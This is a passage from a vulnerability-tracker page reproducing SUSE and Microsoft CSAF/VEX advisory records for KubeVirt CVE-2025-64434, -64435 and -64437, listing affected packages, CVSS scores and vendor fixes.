"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64435",
"url": "https://www.suse.com/security/cve/CVE-2025-64435"
},
{
"category": "external",
"summary": "SUSE Bug 1253189 for CVE-2025-64435",
"url": "https://bugzilla.suse.com/1253189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64435"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
MSRC_CVE-2025-64434
Vulnerability from csaf_microsoft - Published: 2025-11-02 00:00 - Updated: 2026-01-13 01:40Summary
KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing
Notes
Additional Resources
To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer
The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64434 KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64434.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing",
"tracking": {
"current_release_date": "2026-01-13T01:40:10.000Z",
"generator": {
"date": "2026-02-18T14:58:53.121Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-64434",
"initial_release_date": "2025-11-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-11-09T01:01:52.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2025-12-06T14:39:32.000Z",
"legacy_version": "2",
"number": "2",
"summary": "Information published."
},
{
"date": "2025-12-07T01:47:45.000Z",
"legacy_version": "3",
"number": "3",
"summary": "Information published."
},
{
"date": "2026-01-02T14:39:30.000Z",
"legacy_version": "4",
"number": "4",
"summary": "Information published."
},
{
"date": "2026-01-13T01:40:10.000Z",
"legacy_version": "5",
"number": "5",
"summary": "Information published."
}
],
"status": "final",
"version": "5"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
},
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "cbl2 kubevirt 0.59.0-30",
"product": {
"name": "cbl2 kubevirt 0.59.0-30",
"product_id": "4"
}
},
{
"category": "product_version_range",
"name": "cbl2 kubevirt 0.59.0-31",
"product": {
"name": "cbl2 kubevirt 0.59.0-31",
"product_id": "2"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 kubevirt 1.5.0-5",
"product": {
"name": "\u003cazl3 kubevirt 1.5.0-5",
"product_id": "3"
}
},
{
"category": "product_version",
"name": "azl3 kubevirt 1.5.0-5",
"product": {
"name": "azl3 kubevirt 1.5.0-5",
"product_id": "20656"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 kubevirt 0.59.0-33",
"product": {
"name": "\u003ccbl2 kubevirt 0.59.0-33",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "cbl2 kubevirt 0.59.0-33",
"product": {
"name": "cbl2 kubevirt 0.59.0-33",
"product_id": "20772"
}
}
],
"category": "product_name",
"name": "kubevirt"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-30 as a component of CBL Mariner 2.0",
"product_id": "17086-4"
},
"product_reference": "4",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-31 as a component of CBL Mariner 2.0",
"product_id": "17086-2"
},
"product_reference": "2",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "17084-3"
},
"product_reference": "3",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "20656-17084"
},
"product_reference": "20656",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 kubevirt 0.59.0-33 as a component of CBL Mariner 2.0",
"product_id": "17086-1"
},
"product_reference": "1",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-33 as a component of CBL Mariner 2.0",
"product_id": "20772-17086"
},
"product_reference": "20772",
"relates_to_product_reference": "17086"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-64434",
"cwe": {
"id": "CWE-287",
"name": "Improper Authentication"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20656-17084",
"20772-17086"
],
"known_affected": [
"17086-4",
"17086-2",
"17084-3",
"17086-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64434 KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64434.json"
}
],
"remediations": [
{
"category": "none_available",
"date": "2025-11-09T01:01:52.000Z",
"details": "There is no fix available for this vulnerability as of now",
"product_ids": [
"17086-4"
]
},
{
"category": "none_available",
"date": "2025-11-09T01:01:52.000Z",
"details": "There is no fix available for this vulnerability as of now",
"product_ids": [
"17086-2"
]
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:01:52.000Z",
"details": "1.5.3-2:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-3"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"environmentalsScore": 0.0,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"temporalScore": 4.7,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"17086-4",
"17086-2",
"17084-3",
"17086-1"
]
}
],
"title": "KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…